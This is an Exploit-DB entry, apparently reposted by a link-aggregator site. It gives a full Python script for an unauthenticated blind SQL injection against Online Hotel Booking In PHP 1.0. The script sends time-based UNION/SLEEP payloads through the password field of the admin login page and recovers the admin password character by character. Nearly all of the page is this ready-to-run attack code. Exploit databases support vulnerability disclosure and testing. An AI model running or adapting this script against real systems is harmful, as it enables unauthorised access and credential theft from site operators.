2
[webapps] Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated...
source link: https://www.exploit-db.com/exploits/51938
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)
EDB-ID:
51938
EDB Verified:
# Exploit Title: Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)
# Google Dork: n/a
# Date: 04/02/2024
# Exploit Author: Gian Paris C. Agsam
# Vendor Homepage: https://github.com/projectworldsofficial
# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip
# Version: 1.0
# Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12
# CVE : n/a
import requests
import argparse
from colorama import (Fore as F, Back as B, Style as S)
BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,FW = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT,F.WHITE
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
parser = argparse.ArgumentParser(description='Exploit Blind SQL Injection')
parser.add_argument('-u', '--url', help='')
args = parser.parse_args()
def banner():
print(f"""{FR}
·▄▄▄·▄▄▄.▄▄ · ▄▄▄ . ▄▄· ·▄▄▄▄ ▄▄▄ ▪ ·▄▄▄▄
▪ ▐▄▄·▐▄▄·▐█ ▀. ▀▄.▀·▐█ ▌▪██▪ ██ ▀▄ █·▪ ██ ██▪ ██
▄█▀▄ ██▪ ██▪ ▄▀▀▀█▄▐▀▀▪▄██ ▄▄▐█· ▐█▌▐▀▀▄ ▄█▀▄ ▐█·▐█· ▐█▌
▐█▌.▐▌██▌.██▌.▐█▄▪▐█▐█▄▄▌▐███▌██. ██ ▐█•█▌▐█▌.▐▌▐█▌██. ██
▀█▄▀▪▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀ ·▀▀▀ ▀▀▀▀▀• .▀ ▀ ▀█▄▀▪▀▀▀▀▀▀▀▀•
Github: https://github.com/offensive-droid
{FW}
""")
# Define the characters to test
chars = [
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',
'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D',
'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S',
'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7',
'8', '9', '@', '#'
]
def sqliPayload(char, position, userid, column, table):
sqli = 'admin\' UNION SELECT IF(SUBSTRING('
sqli += str(column) + ','
sqli += str(position) + ',1) = \''
sqli += str(char) + '\',sleep(3),null) FROM '
sqli += str(table) + ' WHERE uname="admin"\''
return sqli
def postRequest(URL, sqliReq, char, position):
sqliURL = URL
params = {"emailusername": "admin", "password": sqliReq, "submit": "Login"}
req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies, timeout=10)
if req.elapsed.total_seconds() >= 2:
print("{} : {}".format(char, req.elapsed.total_seconds()))
return char
return ''
def theHarvester(target, CHARS, url):
#print("Retrieving: {} {} {}".format(target['table'], target['column'], target['id']))
print("Retrieving admin password".format(target['table'], target['column'], target['id']))
position = 1
full_pass = ""
while position < 5:
for char in CHARS:
sqliReq = sqliPayload(char, position, target['id'], target['column'], target['table'])
found_char = postRequest(url, sqliReq, char, position)
full_pass += found_char
position += 1
return full_pass
if __name__ == "__main__":
banner()
HOST = str(args.url)
PATH = HOST + "/hotel booking/admin/login.php"
adminPassword = {"id": "1", "table": "manager", "column": "upass"}
adminPass = theHarvester(adminPassword, chars, PATH)
print("Admin Password:", adminPass)
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK